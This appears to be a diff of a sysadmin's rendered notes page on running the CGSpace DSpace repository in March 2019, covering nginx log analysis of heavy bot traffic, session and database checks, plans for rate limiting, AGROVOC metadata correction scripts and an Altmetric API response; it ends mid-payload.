<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
9 190.252.43.162
12 157.55.39.140
18 157.55.39.54
@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
36 157.55.39.9
50 52.23.239.229
2380 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
354 18.195.78.144
363 190.216.179.100
386 40.77.167.185
@ -894,27 +894,27 @@ org.postgresql.util.PSQLException: This statement has been closed.
</code></pre><ul>
<li>The IPs look pretty normal except we&rsquo;ve never seen <code>93.179.69.74</code> before, and it uses the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
</code></pre><ul>
<li>Surprisingly they are re-using their Tomcat session:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74&#39; dspace.log.2019-03-25 | sort | uniq | wc -l
1
</code></pre><ul>
<li>That&rsquo;s weird because the total number of sessions today seems low compared to recent days:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-25 | sort -u | wc -l
5657
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-24 | sort -u | wc -l
17710
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-23 | sort -u | wc -l
17179
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-22 | sort -u | wc -l
7904
</code></pre><ul>
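<li>The same per-day session counts can be collected in one loop instead of repeating the grep; a small sketch:</li>
</ul>
<pre tabindex="0"><code>$ for day in 22 23 24 25; do echo -n &#34;dspace.log.2019-03-${day}: &#34;; grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-${day} | sort -u | wc -l; done
</code></pre><ul>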
<li>PostgreSQL seems to be pretty busy:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
11 dspaceApi
10 dspaceCli
67 dspaceWeb
@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>UptimeRobot says CGSpace went down again and I see the load is again at 14.0!</li>
<li>Here are the top IPs in nginx logs in the last hour:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 35.174.184.209
3 66.249.66.81
4 104.198.9.108
@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
414 45.5.184.72
535 45.5.186.2
2014 205.186.128.185
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 41.204.190.40
160 18.194.46.84
160 54.70.40.11
@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I will add these three to the &ldquo;bad bot&rdquo; rate limiting that I originally used for Baidu</li>
<li>Going further, these are the IPs making requests to Discovery and Browse pages so far today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;(discover|browse)&quot; | grep -E &quot;26/Mar/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;(discover|browse)&#34; | grep -E &#34;26/Mar/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
120 34.207.146.166
128 3.91.79.74
132 108.179.57.67
@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)</li>
<li>Looking at the database usage I&rsquo;m wondering why there are so many connections from the DSpace CLI:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
13 dspaceWeb
@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>Make a minor edit to my <code>agrovoc-lookup.py</code> script to match subject terms with parentheses like <code>COCOA (PLANT)</code></li>
<li>Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d -n
</code></pre><ul>
<li>UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0</li>
<li>Looking at the nginx logs I don&rsquo;t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:</li>
</ul>
<pre><code># grep SemrushBot /var/log/nginx/access.log | grep -E &quot;26/Mar/2019&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &#34;26/Mar/2019&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
2931
</code></pre><ul>
<li>So I&rsquo;m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with &ldquo;bot&rdquo; in the name for a few days to see if things calm down&hellip; maybe not just yet</li>
<li>Otherwise, these are the top users in the web and API logs the last hour (1819):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
54 41.216.228.158
65 199.47.87.140
75 157.55.39.238
@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
277 2a01:4f8:13b:1296::2
291 66.249.66.80
328 35.174.184.209
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 2409:4066:211:2caf:3c31:3fae:2212:19cc
2 35.10.204.140
2 45.251.231.45
@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>For the XMLUI I see <code>18.195.78.144</code> and <code>18.196.196.108</code> requesting only CTA items and with no user agent</li>
<li>They are responsible for almost 1,000 XMLUI sessions today:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)&#39; dspace.log.2019-03-26 | sort | uniq | wc -l
937
</code></pre><ul>
<li>I will add their IPs to the list of bot IPs in nginx so I can tag them as bots and let Tomcat&rsquo;s Crawler Session Manager Valve force them to re-use their session</li>
@ -1033,19 +1033,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request</li>
<li>I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &quot;26/Mar/2019:&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &#34;26/Mar/2019:&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
119
</code></pre><ul>
<li>What&rsquo;s strange is that I can&rsquo;t see any of their requests in the DSpace log&hellip;</li>
</ul>
<pre><code>$ grep -I -c 45.5.184.72 dspace.log.2019-03-26
<pre tabindex="0"><code>$ grep -I -c 45.5.184.72 dspace.log.2019-03-26
0
</code></pre><h2 id="2019-03-28">2019-03-28</h2>
<ul>
<li>Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery (see the command sketch after this list)</li>
<li>What the hell is going on with this CTA publication?</li>
</ul>
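<ul>
<li>For reference, the full Discovery re-index boils down to one command; a minimal sketch (DSpace 5&rsquo;s <code>-b</code> flag rebuilds the whole index):</li>
</ul>
<pre tabindex="0"><code>$ time ~/dspace/bin/dspace index-discovery -b
</code></pre>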
<pre><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 37.48.65.147
1 80.113.172.162
2 108.174.5.117
@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
</li>
<li>In other news, I see that it&rsquo;s not even the end of the month yet and we have 3.6 million hits already:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
3654911
</code></pre><ul>
<li>In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up</li>
@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>It is frustrating to see that the load spikes for our own legitimate load on the server were <em>very</em> aggravated and drawn out by the contention for CPU on this host</li>
<li>We had 4.2 million hits this month according to the web server logs:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
4218841
real 0m26.609s
@ -1114,7 +1114,7 @@ sys 0m2.551s
</code></pre><ul>
<li>Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.33s user 0.07s system 2% cpu 17.167 total
0.27s user 0.04s system 1% cpu 16.643 total
@ -1137,7 +1137,7 @@ sys 0m2.551s
<li>Looking at the weird issue with shitloads of downloads on the <a href="https://cgspace.cgiar.org/handle/10568/100289">CTA item</a> again</li>
<li>The item was added on 2019-03-13 and these three IPs have attempted to download the item&rsquo;s bitstream 43,000 times since it was added eighteen days ago:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep &#39;Spore-192-EN-web.pdf&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 5
42 196.43.180.134
621 185.247.144.227
8102 18.194.46.84
@ -1152,7 +1152,7 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre><code>2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
<pre tabindex="0"><code>2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
</code></pre><ul>
<li>IWMI people emailed to ask why two items with the same DOI don&rsquo;t have the same Altmetric score:
<ul>
@ -1168,16 +1168,16 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. 
DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>The response payload for the second one is the same:</li>
</ul>
<pre><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. 
DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem 